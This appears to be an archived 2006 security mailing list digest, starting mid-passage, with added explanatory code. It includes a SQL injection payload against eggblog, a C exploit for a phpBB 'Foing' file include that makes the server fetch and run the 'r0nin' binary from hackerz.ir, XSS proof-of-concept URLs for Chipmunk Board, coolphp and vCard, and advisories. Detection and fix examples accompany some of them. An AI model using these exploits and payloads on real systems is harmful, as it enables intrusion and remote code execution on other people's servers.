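PAYLOAD = ("1' UNION SELECT 0, 'Username: ' || username, 'Password: ' || password "
           "FROM eggblog_members WHERE '1'='1")


def connect():
    """Fresh in-memory database loaded with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def posts_vulnerable(db, post_id):
    """What the advisory describes: the id parameter is pasted into the SQL
    text.  With magic_quotes_gpc off the quote in the payload terminates the
    literal and everything after it is parsed as SQL."""
    sql = "SELECT id, title, body FROM eggblog_posts WHERE id = '%s'" % post_id
    return db.execute(sql).fetchall()


def posts_fixed(db, post_id):
    """Parameterised form: the value is bound, never parsed as SQL.
    (In the PHP original, casting the id with intval() would do as well.)"""
    sql = "SELECT id, title, body FROM eggblog_posts WHERE id = ?"
    return db.execute(sql, (post_id,)).fetchall()


def leaked_credentials(rows):
    """Pick out the rows the UNION smuggled in: the payload chose id 0 for them."""
    return [(title, body) for (ident, title, body) in rows if ident == 0]


if __name__ == "__main__":
    db = connect()
    print("vulnerable:", leaked_credentials(posts_vulnerable(db, PAYLOAD)))
    print("fixed:     ", posts_fixed(db, PAYLOAD))
```

Against the bound query the whole payload is compared to the integer column as one opaque string and matches nothing; against the concatenated query the member table's username and password columns come back as if they were a post.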
Re: Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING
[EMAIL PROTECTED] wrote:
> This to answer Mr Jon Callas (PGP CTO) and to show him the last proof-of-concept. If he did not get it we consider we have done our part to report a BIG problem in PGP unless this is some kind of HIDDEN feature. We do not know why they just see one side of the coin.

I don't quite see the other side. They, and several others here, have explained what is happening. At most I can see a user interface issue here, as I will detail below:

> What if you had created a virtual disk and given that to someone. That someone uses it as his/her own disk

This is unsafe, unless the disk is reencrypted.

> and decided to change the password because they own the disk now

The assumption that changing the password will disallow access from a former owner of _that_ very same disk is wrong. You have to reencrypt the disk if you want to take full ownership of the data.

> So they did change the password, but the originator can still access that disk if he/she replaces the passphrase bytes in the binary file.

That is not even necessary. You can just save the actual encryption key and decrypt the disk with modified software.

> So I consider this an attack on data INTEGRITY and data AVAILABILITY

Containers of this kind cannot assure this anyway. Integrity of the file might be checkable, but what is the point in checking the integrity of data you want to protect from an adversary that can decrypt the data anyway? Are you suggesting that the software should check for a modified header? How should the software do that? Said header is perfectly valid. It is just for another time in the disk's lifecycle. So you could only check it together with the whole disk. That would mean hashing a few GB of data ... every time you unmount the disk. Or at least every time you want to check integrity - so at least at mount time ... And: what would that give? An attacker can easily disable such checks.

> Regarding availability: since the legitimate user will be denied access to the disk after replacing the passphrase bytes.

How do you want to avoid that? If an attacker has write access to a container file, he can just as well overwrite it with gibberish, thus really denying access. A cryptocontainer is designed to thwart illegitimate access to data. It is not designed to protect its content against manipulation.

> why you do not want to see that your password verification can be simply bypassed,

It cannot. You can only restore a previous version of the disk key, which was encrypted by a known password. You could just as well simply store the disk key.

> besides a reputable co. like PGP should at least put anti-debugging tweaks,

What for? Security by obscurity? If you use it properly, it is absolutely irrelevant if the encryption software is being traced. If you cannot recover the disk key, you can't read a single thing making sense. You are _not_ bypassing any authentication with your trick. You are only using your previous knowledge about the disk key in an obscure way. You can just as well jump ahead in the code to the point where the disk key is there in decrypted form, replace it by the known value and run on. No need to even enter a password actually.

> or even encrypt/hide the passphrase location

It is encrypted. Let's sketch the way such programs work again: When a container is created, a random disk key (DK) is generated. This is what is used to actually encrypt the sectors on the disk. When reading/writing, something along the lines of D_S(DK, [sector ciphertext]) or E_S(DK, [sector plaintext]) is used to en/decrypt the sector, where D_S and E_S are the sector de-/encryption functions, which often take additional state parameters (like the sector number) to avoid some watermarking attacks etc. As humans are very bad at remembering 256 bit binary (or hex or base64 or ...) values, this key needs to be stored somewhere.

Unless hardware crypto tokens are in use, where can you store it? First idea: on disk. But: this would be ridiculously insecure. The solution is to store it, but encrypted. So what disk encryption programs usually do is to store the actual disk key somewhere in the volume header of the container - encrypted with the passphrase the user has to give when mounting. Of course one could as well derive the disk key directly from the passphrase. However that has the disadvantage of not being able to change the passphrase easily.

Let's reiterate the workings once more: When doing operations on the disk like reading/writing sectors, the disk key DK is used like this: D/E_S(DK, [sector cipher/plaintext]). The key DK has been randomly generated at volume creation time. When a user mounts a crypto volume, the disk key needs to be determined. This is done by entering a password/phrase. This passphrase is then used to decrypt an encrypted version of DK. So what is in the volume header is E_DK(K_DK(passphrase), DK) where E_DK is an encryption function
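The header scheme the reply sketches, as an added example (my code, not PGP's): sectors encrypted under a random disk key DK, with DK stored in the header wrapped under K_DK(passphrase). The block cipher is replaced by an HMAC-SHA256 counter-mode keystream so the example needs only the standard library (an assumption; the structure, not the cipher, is the point), and a check value over DK stands in for the product's "password verification". It walks through the thread's scenario: a passphrase change rewrites only the header, so a saved copy of the old header plus the old passphrase still yields DK; only rekey_volume, which re-encrypts every sector under a fresh DK, locks the former owner out.

```python
import hashlib
import hmac
import os

HDR_NONCE = b"volume-header"


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Stand-in for E_S/D_S: XOR with an HMAC-SHA256 counter keystream.
    Symmetric, so one call both encrypts and decrypts.  The nonce carries the
    sector number, the 'additional state parameter' the reply mentions."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, nonce + (i // 32).to_bytes(8, "big"), hashlib.sha256).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def kdf(passphrase: str, salt: bytes) -> bytes:
    """K_DK(passphrase): slow derivation of the header-wrapping key."""
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, 100_000)


def wrap_dk(dk: bytes, passphrase: str) -> dict:
    """Header = E_DK(K_DK(passphrase), DK) plus a check value so a wrong
    passphrase is noticed.  The check is over DK itself: 'verification'
    means 'did we recover the right key', not an access-control decision."""
    salt = os.urandom(16)
    return {
        "salt": salt,
        "wrapped_dk": keystream_xor(kdf(passphrase, salt), HDR_NONCE, dk),
        "check": hmac.new(dk, b"check", hashlib.sha256).digest(),
    }


def unlock(header: dict, passphrase: str) -> bytes:
    dk = keystream_xor(kdf(passphrase, header["salt"]), HDR_NONCE, header["wrapped_dk"])
    expected = hmac.new(dk, b"check", hashlib.sha256).digest()
    if not hmac.compare_digest(expected, header["check"]):
        raise ValueError("wrong passphrase (or header from another volume)")
    return dk


def encrypt_sectors(dk: bytes, plaintext: list) -> list:
    return [keystream_xor(dk, n.to_bytes(8, "big"), s) for n, s in enumerate(plaintext)]


def decrypt_sectors(dk: bytes, ciphertext: list) -> list:
    return [keystream_xor(dk, n.to_bytes(8, "big"), s) for n, s in enumerate(ciphertext)]


def create_volume(passphrase: str, plaintext: list):
    dk = os.urandom(32)                      # random DK, generated once per volume
    return wrap_dk(dk, passphrase), encrypt_sectors(dk, plaintext)


def change_passphrase(header: dict, old: str, new: str) -> dict:
    """Only the header changes; DK and every sector stay exactly as they were."""
    return wrap_dk(unlock(header, old), new)


def rekey_volume(header: dict, passphrase: str, sectors: list):
    """Take real ownership: fresh DK, every sector re-encrypted."""
    plaintext = decrypt_sectors(unlock(header, passphrase), sectors)
    return create_volume(passphrase, plaintext)


def demo() -> dict:
    """The thread's scenario, on constructed sample sectors."""
    data = [b"sector zero: secrets " * 3, b"sector one: more secrets"]
    old_header, sectors = create_volume("originator-pass", data)
    saved_header = dict(old_header)          # the originator keeps a copy of the header bytes
    new_header = change_passphrase(old_header, "originator-pass", "new-owner-pass")
    # Restoring the old header bytes puts the originator straight back in:
    still_in = decrypt_sectors(unlock(saved_header, "originator-pass"), sectors) == data
    # After a real rekey the old DK decrypts the new sectors to garbage:
    rekeyed_header, rekeyed_sectors = rekey_volume(new_header, "new-owner-pass", sectors)
    old_dk = unlock(saved_header, "originator-pass")
    locked_out = decrypt_sectors(old_dk, rekeyed_sectors) != data
    new_owner_ok = decrypt_sectors(unlock(rekeyed_header, "new-owner-pass"), rekeyed_sectors) == data
    return {"old_header_after_pw_change": still_in,
            "old_header_after_rekey_fails": locked_out,
            "new_owner_after_rekey": new_owner_ok}


if __name__ == "__main__":
    print(demo())
```

Note that unlock() never consults a "password" at all once DK is in hand; anyone who saved DK (or the header that wraps it under a passphrase they know) can skip the passphrase step entirely, which is the reply's point.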
Foing Remote File Include Vulnerability [PHPBB]
vendor : phpbbhacks.com
Exploit BY : s3rv3r_hack3r
WWW : http://www.hackerz.ir

Exploit:

/* Foing Remote File Include exploit By s3rv3r_hack3r */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 80

/* The request: phpbb_root_path points at the attacker's cmd.txt; the trailing '?'
 * turns whatever Foing appends to the include path into a query string for that
 * remote file, and cmd= makes it fetch and run r0nin from /tmp. */
char shellop[] =
    "GET /index.php?phpbb_root_path=http://www.hackerz.ir/cmd.txt?cmd=cd ../../../../../../../../../../tmp;"
    "wget http://www.hackerz.ir/r0nin;; chmod +X r0nin;./r0nin%60%22|\r\n";

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in remop;

    if (argc != 2) {
        printf("\n\n");
        printf("\n Iran Hackerz Security Team \n");
        printf("\nWebSite's: www.hackerz.ir www.h4ckerz.com \n");
        printf("\n\n");
        printf("\n*Foing Remote File Include Vulnerability [PHPBB]* \n");
        printf("\n\n");
        /* inet_addr() takes a dotted-quad IP, not a URL; the request is sent to /index.php. */
        printf("\nUsage: %s <victim-ip>\n", argv[0]);
        printf("\n\n");
        return 0;
    }

    printf("\n\n");
    printf("\nExploit By : [EMAIL PROTECTED]\n");
    printf("\nPLZ A W8\n");
    printf("\n\n");

    memset(&remop, 0, sizeof(remop));
    remop.sin_family = AF_INET;
    remop.sin_port = htons(PORT);
    remop.sin_addr.s_addr = inet_addr(argv[1]);

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("\nERROR: Socket()\n\n");
        return -1;
    }
    if (connect(sock, (struct sockaddr *)&remop, sizeof(struct sockaddr)) < 0) {
        printf("\nERROR: Connect()\n\n");
        return -1;
    }
    /* strlen(), not sizeof(): do not send the terminating NUL */
    if (send(sock, shellop, strlen(shellop), 0) < 0) {
        printf("\nERROR: Send()\n\n");
        return -1;
    }
    close(sock);
    sleep(3);
    printf("\nr0nin run successfully\n\n");
    printf("\n");
    return 0;
}
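Both phpBB-related file inclusion posts on this page (the Blend Portal blend_common.php advisory and the Foing exploit above) ride on the same thing: a register_globals-supplied phpbb_root_path that lands in include_once(). The following is an added example, not code from either post, that picks such attempts out of an Apache combined-format access log. The log lines, client IPs and attacker hostnames are constructed here, and the list of parameter names treated as include paths is my assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log (Apache combined format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [28/May/2006:20:46:39 +0300] "GET /phpBB/blend_data/blend_common.php?phpbb_root_path=http://attacker.example/cmd.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [28/May/2006:20:47:02 +0300] "GET /phpBB/blend_data/blend_common.php?phpbb_root_path=/etc/passwd%00 HTTP/1.0" 200 1833 "-" "Mozilla/4.0"
198.51.100.7 - - [29/May/2006:01:12:10 +0300] "GET /foing/index.php?phpbb_root_path=http://attacker.example/cmd.txt?cmd=id HTTP/1.0" 200 88 "-" "-"
192.0.2.44 - - [29/May/2006:01:15:00 +0300] "GET /phpBB/viewtopic.php?t=12&start=15 HTTP/1.1" 200 9031 "http://forum.example/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Parameter names that commonly end up in include()/require() (assumption, extend per app).
INCLUDE_PARAMS = {"phpbb_root_path", "root_path", "path", "page", "file", "inc", "include", "dir"}


def classify(param: str, value: str):
    """Reason string if this value looks like a file inclusion attempt, else None."""
    lowered = value.lower()
    if lowered.startswith(("http://", "https://", "ftp://", "ftps://")):
        return "remote-include"            # the allow_url_fopen case
    if lowered.startswith(("php://", "data:", "expect://")):
        return "stream-wrapper"            # local code execution without a remote fetch
    if "\x00" in value:
        return "null-byte-truncation"      # %00 drops the suffix the script appends
    if param in INCLUDE_PARAMS and ("../" in value or value.startswith("/")):
        return "local-path"                # traversal or absolute local file
    return None


def scan_log(text: str) -> list:
    """Parse each line, decode its query string and flag suspicious parameter values."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        for param, values in parse_qs(target.query, keep_blank_values=True).items():
            for value in values:
                reason = classify(param, value)
                if reason:
                    findings.append({"ip": m["ip"], "ts": m["ts"], "path": target.path,
                                     "param": param, "value": value, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']}={f['value']!r}: {f['reason']}")
```

The trailing `?` in `cmd.txt?` is deliberate on the attacker's side (it turns the suffix the script appends into a query string for the attacker's server), so the URL is matched after decoding, on the parameter value's prefix rather than on the whole request line.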
New SMB and DCERPC features on Impacket released with doc
Hi!

As we promised in the too short 5 minutes talk at CanSecWest last month, here we are publishing a new version of Impacket including all the new features we added for SMB and DCERPC. At the same time we are releasing a document describing what these new and weird features are, full of examples of how to use them, including a crash for MS05-039 (UMPNP remotely exploitable buffer overflow), written in Python using this library, which can be used as a base for other DCERPC exploits and configured in lots of different ways to send non-standard and correct traffic.

Some of the new features are:
* NMB and SMB (high-level implementations).
* DCE/RPC versions 4 and 5, over different transports: UDP (version 4 exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP.
* Multiple ways of doing SMB tree_connect, file open, read, write.
* SMB fragmentation, SMB AndX command chaining.
* Plain, NT and LM v1 authentications, using password and hashes only.
* Portions of the following DCE/RPC interfaces: Conv, DCOM, EPM, SAMR, SvcCtl, WinReg.
* DCERPC alternate contexts, multi-bind requests, endianness selection.
* DCERPC NT and LM v1 authentication, integrity checking and encryption.
* DCERPC v4 and v5 fragmentation, DCERPC v4 idempotent requests.

Take a look here: http://www.corest.com/common/showdoc.php?idx=539&idxseccion=11 and send feedback to us.

gera and beto
WikiNi Persistent Cross Site Scripting Vulnerability
Hi,

I've found a vulnerability more than 2 months ago, and notified the developers, but still no answer, so I'm posting here.
http://zone14.free.fr/advisories/3/

Vendor: WikiNi
Vulnerable: WikiNi 0.4.2 and below

Persistent Cross Site Scripting
A persistent XSS vulnerability is the most dangerous kind of XSS vulnerability, as the data submitted by the malicious user is stored permanently on the server. It could potentially hit a large number of other users with little need for social engineering.
Just edit a page and insert:
<script>alert('XSS Vulnerable');</script>

Restrictions
The attacker needs to have the rights to edit at least one page of the wiki, but most of the time it is the case. Moreover, WikiNi 0.4.2 is used on more than 100,000 pages according to Google.

--Raphaël HUCK
[SECURITY] [DSA 1082-1] New Linux kernel 2.4.17 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -- Debian Security Advisory DSA 1082-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze, Dann Frazier
May 29th, 2006 http://www.debian.org/security/faq
- --

Package: kernel-image-2.4.17-hppa kernel-image-2.4.17-ia64 kernel-image-2.4.17-s390 kernel-patch-2.4.17-apus kernel-patch-2.4.17-mips kernel-patch-2.4.17-s390 kernel-source-2.4.17
Vulnerability : several
Problem-Type : local/remote
Debian-specific: no
CVE IDs: CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685 CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2004-0427
    A local denial of service vulnerability in do_fork() has been found.
CVE-2005-0489
    A local denial of service vulnerability in proc memory handling has been found.
CVE-2004-0394
    A buffer overflow in the panic handling code has been found.
CVE-2004-0447
    A local denial of service vulnerability through a null pointer dereference in the IA64 process handling code has been found.
CVE-2004-0554
    A local denial of service vulnerability through an infinite loop in the signal handler code has been found.
CVE-2004-0565
    An information leak in the context switch code has been found on the IA64 architecture.
CVE-2004-0685
    Unsafe use of copy_to_user in USB drivers may disclose sensitive information.
CVE-2005-0001
    A race condition in the i386 page fault handler may allow privilege escalation.
CVE-2004-0883
    Multiple vulnerabilities in the SMB filesystem code may allow denial of service or information disclosure.
CVE-2004-0949
    An information leak was discovered in the SMB filesystem code.
CVE-2004-1016
    A local denial of service vulnerability has been found in the SCM layer.
CVE-2004-1333
    An integer overflow in the terminal code may allow a local denial of service vulnerability.
CVE-2004-0997
    A local privilege escalation in the MIPS assembly code has been found.
CVE-2004-1335
    A memory leak in the ip_options_get() function may lead to denial of service.
CVE-2004-1017
    Multiple overflows exist in the io_edgeport driver which might be usable as a denial of service attack vector.
CVE-2005-0124
    Bryan Fulton reported a bounds checking bug in the coda_pioctl function which may allow local users to execute arbitrary code or trigger a denial of service attack.
CVE-2005-0528
    A local privilege escalation in the mremap function has been found.
CVE-2003-0984
    Improper initialization of the RTC may disclose information.
CVE-2004-1070
    Insufficient input sanitising in the load_elf_binary() function may lead to privilege escalation.
CVE-2004-1071
    Incorrect error handling in the binfmt_elf loader may lead to privilege escalation.
CVE-2004-1072
    A buffer overflow in the binfmt_elf loader may lead to privilege escalation or denial of service.
CVE-2004-1073
    The open_exec function may disclose information.
CVE-2004-1074
    The binfmt code is vulnerable to denial of service through malformed a.out binaries.
CVE-2004-0138
    A denial of service vulnerability in the ELF loader has been found.
CVE-2004-1068
    A programming error in the unix_dgram_recvmsg() function may lead to privilege escalation.
CVE-2004-1234
    The ELF loader is vulnerable to denial of service through malformed binaries.
CVE-2005-0003
    Crafted ELF binaries may lead to privilege escalation, due to insufficient checking of overlapping memory regions.
CVE-2004-1235
    A race condition in the load_elf_library() and binfmt_aout() functions may allow privilege escalation.
CVE-2005-0504
    An integer overflow in the Moxa driver may lead to privilege escalation.
CVE-2005-0384
    A remote denial of service vulnerability has been found in the PPP driver.
CVE-2005-0135
    An IA64 specific local denial of service vulnerability has been found in the unw_unwind_to_user() function.

The following matrix explains which kernel version for which architecture fixes the problems mentioned
Multiple Xss exploits in Chipmunk Board
Subject: Multiple Xss exploits in Chipmunk Board
Date: 27 May 2006 10:51:30 -

Multiple Xss exploits in Chipmunk Board
forum type : Chipmunk Board
bug found by : black-code & sweet-devil
team : site-down
type : Xss

black-code:
codes :
http://www.example.com/board/index.php?forumID='<script>alert(10)</script>
http://www.example.com/board/newtopic.php?forumID='<script>alert(10)</script>
http://www.example.com/board/reply.php?forumID='<script>alert(10)</script>
http://www.example.com/board/edit.php?forumIDID='<script>alert(10)</script>
http://www.example.com/board/edit.php?quote.php?forumID=forumIDID='<script>alert(10)</script>
http://www.example.com/board/edit.php?forumID=forumIDID='<script>alert(10)</script>

path to admin login: http://www.xxx.com/path/admin

All my respect to my friend sweet-devil, lezr.com, g123g.net .. done .. peace
RE: Multiple Xss exploits in coolphp magazine
Subject: Multiple Xss exploits in coolphp magazine
Date: 27 May 2006 14:25:31 -

Multiple Xss exploits in coolphp magazine
script type : coolphp magazine
bug found by : black-code & sweet-devil
team : site-down
type : Xss

Codes :
***
http://www.xxx.com/coolphp/index.php?op='<script>alert(10)</script>
http://www.xxx.com/coolphp/index.php?op=userinfo&nick='<script>alert(10)</script>
***
And :
http://www.xxx.com/coolphp/index.php?op=='<script>alert(10)</script>
Put instead of any name as :
http://xxx.net/coolphp/index.php?op=userinfo='<script>alert(10)</script>
or
http://xxx.net/coolphp/index.php?op=comp_der='<script>alert(10)</script>
or
http://xxx.net/coolphp/index.php?op=encuestas='<script>alert(10)</script>
or
http://xxx.net/coolphp/index.php?op=pagina='<script>alert(10)</script>

Emails : [EMAIL PROTECTED] [EMAIL PROTECTED]

All my respect to my friend sweet-devil, lezr.com, g123g.net .. done .. peace
multiple Xss exploits in : vCard 2.9
Subject: multiple Xss exploits in : vCard 2.9
Date: 27 May 2006 11:12:55 -

multiple Xss exploits in : vCard 2.9
forum type : vCard 2.9
bug found by : black-code & sweet-devil
team : site-down
type : Xss

sweet-devil:
http://www.example.com/cards/create.php?card_id='<script>alert(10)</script>
http://www.example.com/cards/toprated.php?page='<script>alert(10)</script>

black-code:
http://www.example.com/cards/newcards.php?page='<script>alert(10)</script>

path to admin login: http://www.xxx.com/pth/admin

All my respect to my friend sweet-devil, lezr.com, g123g.net .. done .. peace
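The three reflected-XSS posts above (Chipmunk Board, coolphp magazine, vCard 2.9) all use the same probe: a leading single quote, to break out of a quoted attribute, followed by a script tag. The following is an added example, not code from any of those projects: a constructed page template that echoes a parameter both in text and inside a quoted attribute, the same template with html.escape(), and a probe that replays the posted PoC URLs (hostnames as in the posts) against each renderer and reports where the marker comes back intact. Escaping at render time in the same way is also what closes the stored case in the WikiNi post, since a stored payload is just one that is reflected on every later view.

```python
import html
from urllib.parse import urlsplit, parse_qs

PAYLOAD = "'<script>alert(10)</script>"

# PoC URLs as posted; one per post, placeholder hosts as in the posts.
POC_URLS = [
    "http://www.example.com/board/index.php?forumID=" + PAYLOAD,
    "http://www.example.com/cards/create.php?card_id=" + PAYLOAD,
    "http://www.xxx.com/coolphp/index.php?op=userinfo&nick=" + PAYLOAD,
]


def render_vulnerable(params: dict) -> str:
    """Constructed template: every parameter echoed raw, once as text and
    once inside a single-quoted attribute (which the leading ' breaks out of)."""
    rows = "".join(f"<p>{k}: {v}</p><a href='?{k}={v}'>again</a>" for k, v in params.items())
    return f"<html><body>{rows}</body></html>"


def render_fixed(params: dict) -> str:
    """Same template with html.escape(quote=True): <, >, & and both quote
    characters become entities, so neither the text nor the attribute
    context can be escaped from."""
    e = lambda s: html.escape(s, quote=True)
    rows = "".join(f"<p>{e(k)}: {e(v)}</p><a href='?{e(k)}={e(v)}'>again</a>"
                   for k, v in params.items())
    return f"<html><body>{rows}</body></html>"


def reflected_unescaped(body: str, marker: str = PAYLOAD) -> bool:
    """True if the marker survives into the page byte-for-byte."""
    return marker in body


def probe(urls, renderer) -> list:
    """Replay each PoC URL through a renderer; return (path, [params that
    carried the marker]) for every page where it is reflected unescaped."""
    hits = []
    for url in urls:
        parts = urlsplit(url)
        params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
        if reflected_unescaped(renderer(params)):
            hits.append((parts.path, [k for k, v in params.items() if v == PAYLOAD]))
    return hits


if __name__ == "__main__":
    print("vulnerable:", probe(POC_URLS, render_vulnerable))
    print("fixed:     ", probe(POC_URLS, render_fixed))
```

The probe deliberately checks for the exact marker rather than for "alert(10)": a page that entity-encodes the angle brackets but leaves the quote alone still fails the attribute context, and that shows up as the marker minus its tags, which a looser match would miss.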
[KAPDA::#46] - Nukedit Unauthorized Admin Add
KAPDA New advisory
Vulnerable product : Nukedit <= 4.9.6
Vendor: http://www.nukedit.com
Vulnerability: Unauthorized Admin Add

Date :
Found : 2006/05/10
Vendor Contacted : N/A
Release Date : 2006/05/29

About Nukedit :
Nukedit is a Content Management System (CMS).

Vulnerable page:
utilities/register.asp

PoC:
HTML PoC : http://kapda.ir/attach-1661-nukedit.txt
Save this code as .htm and then execute. This exploit will create an admin account. Then login with your email + your password.

Solution:
Update to a new version of Nukedit.

Original Advisory:
http://www.kapda.ir/advisory-337.html

Credit :
FarhadKey of KAPDA
farhadkey [at} kapda d0t net
Kapda - Security Science Researchers Institute of Iran
http://www.KAPDA.ir
Re: LM hashes in a hot-desking environment
On Sat, 27 May 2006, Ansgar -59cobalt- Wiechers wrote:
> On 2006-05-25 [EMAIL PROTECTED] wrote:
>> Although it is a well known fact that Windows desktops and servers still use LM Hashes and cache the last ten userids and passwords locally, just in case an Active Directory, Domain, or NDS tree is not available, has anyone thought about the consequences of this issue in a hot-desking, or flexible working environment?
>
> That's why you use policies to disable use of LM hashes and caching of passwords in environments like that.

Exactly. You don't do caching on computers that won't ever come off the network, i.e. don't do it on desktops. If you have that much of a problem with AD being unavailable, you'd better look more closely at your AD architecture. You may do caching on laptops, and then I'd hope you don't have people sharing laptops. If you do, well then, that's another story requiring careful consideration, but a little off-topic.

--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
Anthony J. Biacco    Systems/Network Administrator
[EMAIL PROTECTED]    http://www.asteroid-b612.org
as I always say, why go Merlot, when you can call a Cab?
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-